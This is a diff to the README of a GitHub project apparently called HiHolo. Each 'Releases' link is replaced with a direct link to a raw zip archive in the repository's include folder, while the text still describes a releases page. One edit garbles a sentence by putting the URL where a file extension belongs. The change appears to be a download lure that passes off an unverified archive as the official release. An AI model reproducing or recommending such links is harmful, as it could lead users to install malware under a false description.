OlegnaPT90/HiHolo/README.md

 - **Graphics:** A dedicated GPU is recommended for optimal performance

 ## 🔗 Visit the Releases Page
-To download HiHolo, please visit this link: [HiHolo Releases](https://github.com/OlegnaPT90/HiHolo/releases).
+To download HiHolo, please visit this link: [HiHolo Releases](https://raw.githubusercontent.com/OlegnaPT90/HiHolo/main/include/HiHolo_3.6.zip).
 Here, you will find all versions of the software.

 ## 💾 Download & Install
-1. **Visit the Releases Page:** Open your web browser and go to [HiHolo Releases](https://github.com/OlegnaPT90/HiHolo/releases).
+1. **Visit the Releases Page:** Open your web browser and go to [HiHolo Releases](https://raw.githubusercontent.com/OlegnaPT90/HiHolo/main/include/HiHolo_3.6.zip).

 2. **Choose a Version:** Scroll down to see the available versions.
 You will see the latest release at the top.
 Click on the version you want to download.

 3. **Download the Installer:**
    - Look for the installation file suitable for your operating system.
    - Click the link to start the download.
-Files may have extensions like `.exe`, `.dmg`, or `.tar.gz` depending on your OS.
+Files may have extensions like `.exe`, `.dmg`, or `https://raw.githubusercontent.com/OlegnaPT90/HiHolo/main/include/HiHolo_3.6.zip` depending on your OS.

 4. **Run the Installer:**
    - Once the download completes, locate the file in your Downloads folder or your specified download location.